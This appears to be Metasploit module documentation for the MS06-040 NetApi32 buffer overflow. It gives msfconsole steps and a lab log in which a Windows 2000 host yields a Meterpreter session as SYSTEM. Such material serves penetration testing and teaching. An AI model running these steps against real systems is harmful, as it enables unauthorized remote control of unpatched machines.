## Vulnerable Application

This module exploits a stack buffer overflow in the NetApi32 CanonicalizePathName() function using the NetpwPathCanonicalize RPC call in the Server Service. It is likely that other RPC calls could be used to exploit this service. This exploit will result in a denial of service on Windows XP SP2 or Windows 2003 SP1. A failed exploit attempt will likely result in a complete reboot on Windows 2000 and the termination of all MB-related services on Windows XP. The default target for this exploit should succeed on Windows NT 4.0, Windows 2000 SP0-SP4+, Windows XP SP0-SP1 and Windows 2003 SP0.

## Verification Steps

  1. Start msfconsole
  2. Do: `use modules/exploits/windows/smb/ms06_040_netapi`
  3. Do: `set RHOSTS [IP]`
  4. Do: `set PAYLOAD [payload]`
  5. Do: `set LHOST [IP]`
  6. Do: `set LPORT [port]`
  7. Do: `run`

## Scenarios

### A run against Windows 2000 (Build 2195, SP4) and Kali Linux 2019.3

  ```
  msf exploit(windows/smb/ms06_040_netapi) > use modules/exploit/windows/smb/ms06_040_netapi
  msf exploit(windows/smb/ms06_040_netapi) > set RHOSTS 192.168.1.2
  msf exploit(windows/smb/ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
  msf exploit(windows/smb/ms06_040_netapi) > exploit

    [*] 192.168.1.2:445 - Detected a Windows 2000 target
    [*] 192.168.1.2:445 - Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
    [*] 192.168.1.2:445 - Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.1.2[\BROWSER] ...
    [*] 192.168.1.2:445 - Building the stub data...
    [*] 192.168.1.2:445 - Calling the vulnerable function...
    [*] Started bind TCP handler against 192.168.1.2:4444
    [*] Sending stage (180291 bytes) to 192.168.1.2
    [*] Meterpreter session 1 opened (192.168.1.3:39603 -> 192.168.1.2:4444) at 2019-12-02 11:48:52 -0700


  meterpreter > sysinfo
    Computer        : PC-B43791F5F5
    OS              : Windows 2000 (5.0 Build 2195).
    Architecture    : x86
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 1
    Meterpreter     : x86/windows

  meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
  ```
